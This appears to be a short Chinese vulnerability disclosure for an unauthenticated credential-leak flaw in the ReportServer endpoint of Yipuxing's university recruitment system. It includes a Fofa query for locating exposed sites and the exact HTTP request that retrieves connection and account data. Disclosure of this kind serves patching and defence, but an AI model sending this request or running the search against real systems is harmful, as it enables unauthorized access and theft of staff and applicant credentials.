易普行科技高校招聘系统 ReportServer 敏感信息泄露

0x01 产品描述:

‌**易普行科技的高校招聘系统** ‌是一个专门为国内高校提供人力资源管理信息化服务的系统,由北京易普行科技有限公司开发。该公司总部位于北京市海淀区,并在上海、广州、南京、武汉、西安、成都等城市设有分支机构,业务覆盖全国各地区,已有众多高校用户,在业内树立了良好的口碑‌。
0x02 漏洞描述:

易普行科技高校招聘系统/ReportServer接口存在未授权访问泄露用户账号密码等重要数据,导致攻击者可通过泄露实现登录。
0x03 搜索语句:

Fofa:body="FM_SYS_ID" || body="product/recruit/website/RecruitIndex.jsp"


0x04 漏洞复现:

复制代码
GET /ReportServer?op=Fr_server&cmd=Sc_getconnectioninfo HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*


0x05 修复建议:

厂商已发布补丁 请即时修复。

相关推荐
听你说3210 分钟前
五新智能:以成套智能装备赋能全球工程建设
安全·创业创新
小五传输35 分钟前
内外网文件交换系统产品推荐 解决隔离网络文件交换5类难题
大数据·运维·安全
More more1 小时前
纯手搓css样式:科技感弹窗边框
css·科技·css3
非凸科技2 小时前
浙商证券走进非凸科技,共探数智交易的技术内核与生态共建
科技
技术不好的崎鸣同学12 小时前
[ACTF2020 新生赛]Exec 思路及解法
算法·安全·web安全
minge000114 小时前
【世界杯中的AI】(2026-07-05)当足球遇见AI:7月5日世界杯的“人机共舞”与冷门之夜
人工智能·科技·世界杯
MartinYeung520 小时前
[论文学习]SecureGate:通过令牌级门控学习何时安全地揭示PII-深度解析
学习·安全
蓝速科技21 小时前
蓝速科技会议电子门牌部署与可视化管控指南
科技
广州市顺风搬家服务有限公司21 小时前
实验室搬迁科普专业流程防护标准与合规核心要点
网络·其他·安全
Xi-Xu1 天前
什么时候需要 Multi-agent:不是分工,而是运行边界
人工智能·经验分享·安全